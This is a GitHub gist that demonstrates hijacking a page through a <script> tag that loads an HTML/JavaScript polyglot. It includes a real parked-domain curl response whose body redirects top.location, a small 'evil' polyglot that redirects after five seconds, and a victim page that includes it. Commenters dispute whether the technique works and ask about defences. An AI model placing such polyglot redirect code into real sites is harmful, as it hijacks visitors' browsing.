Created
January 3, 2016 21:56
-
-
Save sehrgut/2cf3179185c915788a82 to your computer and use it in GitHub Desktop.
How to hijack a page via a <script> tag loading HTML. Real-world example in curl-output.txt.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| HTTP/1.1 302 Found | |
| Date: Sun, 03 Jan 2016 19:58:45 GMT | |
| Server: Apache | |
| X-Powered-By: PHP/5.4.45-0+deb7u2 | |
| Location: http://ww31.gvisit.com/record.php?sid=592101993e8b9913eb0462e5bd4d7501 | |
| Content-Length: 0 | |
| Connection: close | |
| Content-Type: text/html; charset=UTF-8 | |
| HTTP/1.1 200 OK | |
| Date: Sun, 03 Jan 2016 19:58:45 GMT | |
| Server: Apache | |
| X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Gzq771WhJU+b7w0c5Lws6JzVrVwB7ft1+YqfHuwEaoyWmYfzltRbJbJUQTnaj/qbPPUYRI8QQTXRbMWK39GUJA== | |
| Vary: Accept-Encoding,User-Agent | |
| Content-Length: 3234 | |
| Content-Type: text/html; charset=UTF-8 | |
| <!-- | |
| top.location="http://ww31.gvisit.com/?fp=%2BBJL7%2F4axwKg7d7aLlyxF0vECGt%2FlWKiPyysAOEmJJg1kWd%2BU4RyUfIKasvNeyLy5dAeet0P5EcCojXgLdE7Ow%3D%3D&prvtof=T0M6%2BAayVN8Ot5EQzfPF0S1DRTUEhu9j%2B0JTpMQ%2FsB%2FLksJ3g1xdCyhyTI8j%2B%2F0N&poru=AwzWORPE7CPE0lrCMmvjVu3FI0q%2F3OKRR38XeQsupGDnFdPDmOFjaztT45sZx%2FVeS9zvfMBscq%2BI8lLc9qnKThKsqMojZwudCae3anEhItMlQOgsMVzc%2BDWB%2F%2F9I7JQ4&cifr=1&sid=592101993e8b9913eb0462e5bd4d7501"; | |
| /* | |
| --> | |
| <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Gzq771WhJU+b7w0c5Lws6JzVrVwB7ft1+YqfHuwEaoyWmYfzltRbJbJUQTnaj/qbPPUYRI8QQTXRbMWK39GUJA=="><head> | |
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> | |
| <meta name="viewport" content="width=device-width"><script type="text/javascript"> | |
| <!-- | |
| dimensionUpdated = 0; | |
| function applyFrameKiller() | |
| { | |
| if(window.top != self) | |
| { | |
| cHeight = 0; | |
| if( typeof( window.innerHeight ) != 'undefined' ) { | |
| //Non-IE | |
| cHeight = window.innerHeight; | |
| dimensionUpdated = 1; | |
| } else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) { | |
| //IE 6+ in 'standards compliant mode' | |
| cHeight = document.documentElement.clientHeight; | |
| dimensionUpdated = 1; | |
| } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) { | |
| //IE 4 compatible | |
| cHeight = document.body.clientHeight; | |
| dimensionUpdated = 1; | |
| } | |
| if( cHeight <= 250 && dimensionUpdated == 1) | |
| { | |
| window.top.location = "http://ww31.gvisit.com/?fp=%2BBJL7%2F4axwKg7d7aLlyxF0vECGt%2FlWKiPyysAOEmJJg1kWd%2BU4RyUfIKasvNeyLy5dAeet0P5EcCojXgLdE7Ow%3D%3D&prvtof=u5NXp3zVWTdYGMkV6iK%2B4MyyRiKQ6AKDxOhUgf5wJTptsVA9ori8WVATqWKXvLt0&poru=QDwxIevt5vHnM50HJeR1FHgomDuSUsv2YcjV%2BtQB25TFAx1unh7hMrc6PRVUA%2B%2BRXbdNuEJ%2B3dFd2IiRpIcEJ5T3wS6dVYDopSaRlsesTgievTVL4dt%2BcIV7%2BLrH%2BM55&cifr=1&sid=592101993e8b9913eb0462e5bd4d7501"; | |
| } | |
| } | |
| } | |
| applyFrameKiller(); | |
| // --> | |
| </script><script type='text/javascript'>try{document.cookie = 'fjccheck=1';}catch(exception){}</script></head><frameset rows="100%,*" frameborder="no" border="0" framespacing="0"> | |
| <frame src="http://ww31.gvisit.com/?fp=%2BBJL7%2F4axwKg7d7aLlyxF0vECGt%2FlWKiPyysAOEmJJg1kWd%2BU4RyUfIKasvNeyLy5dAeet0P5EcCojXgLdE7Ow%3D%3D&prvtof=tLdsRL2VNtQbqYMv4TV6N%2FKAg3xaT2EfTL%2BG1exkntEXmI2qgvDCPlaqUGT5HqTp&poru=bCVQ8NcV%2BXuYYlP66iEKcJV2GZc3TYXTFkuzqadeHJrqLqehflgEhknX0sd4fKXIIyQfi45WiR4fZz16O8IhfkUS4XrIgX9KzniMaJBGXvDmbQgq1KIceO3pI4tfQHsT&sid=592101993e8b9913eb0462e5bd4d7501"> | |
| </frameset> | |
| <noframes> | |
| <body bgcolor="#ffffff" text="#000000"> | |
| <a href="http://ww31.gvisit.com/?fp=%2BBJL7%2F4axwKg7d7aLlyxF0vECGt%2FlWKiPyysAOEmJJg1kWd%2BU4RyUfIKasvNeyLy5dAeet0P5EcCojXgLdE7Ow%3D%3D&prvtof=TTv2W3uWKJ13MvB5JzJjEBQ8QPV%2F2EaSQy%2B59K8xjUHGZO5Mc6JCUydv8Cs7W9Q%2F&poru=XICWjsQCNh2FX8JNB6qC8YLcP%2FzhDLP8sfUOrYm1ia5ZI1l20rkPwwlth7UrQqKVMc%2BBXDaaAN45SLmow9XFkbIgC6GLv%2FluqybgsfPxUmpcn1icL6fz146JkQwSIAaR&sid=592101993e8b9913eb0462e5bd4d7501">Click here to proceed</a>. | |
| </body> | |
| </noframes></html><!-- | |
| */ | |
| --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!--- | |
| setTimeout('window.location="http://google.com/"', 5000); | |
| /* | |
| --> | |
| <html> | |
| <head> | |
| <title>Evil Web Page</title> | |
| <meta http-equiv="refresh" content="5; url=http://google.com/" | |
| </head> | |
| <body> | |
| <p>Hi! I'm evil!</p> | |
| </body> | |
| </html> | |
| <!--*/--> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>Sucker</title> | |
| <script src="./evil.js.html" type="text/javascript"></script> | |
| </head> | |
| <body> | |
| <p>Hi! I'm a sucker who included the third-party js being hijacked.</p> | |
| </body> | |
| </html> |
Somebody is wrong on the internet. HTML source cannot be included through a <script> tag.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
how do you stop it, if its used on your wordpress site?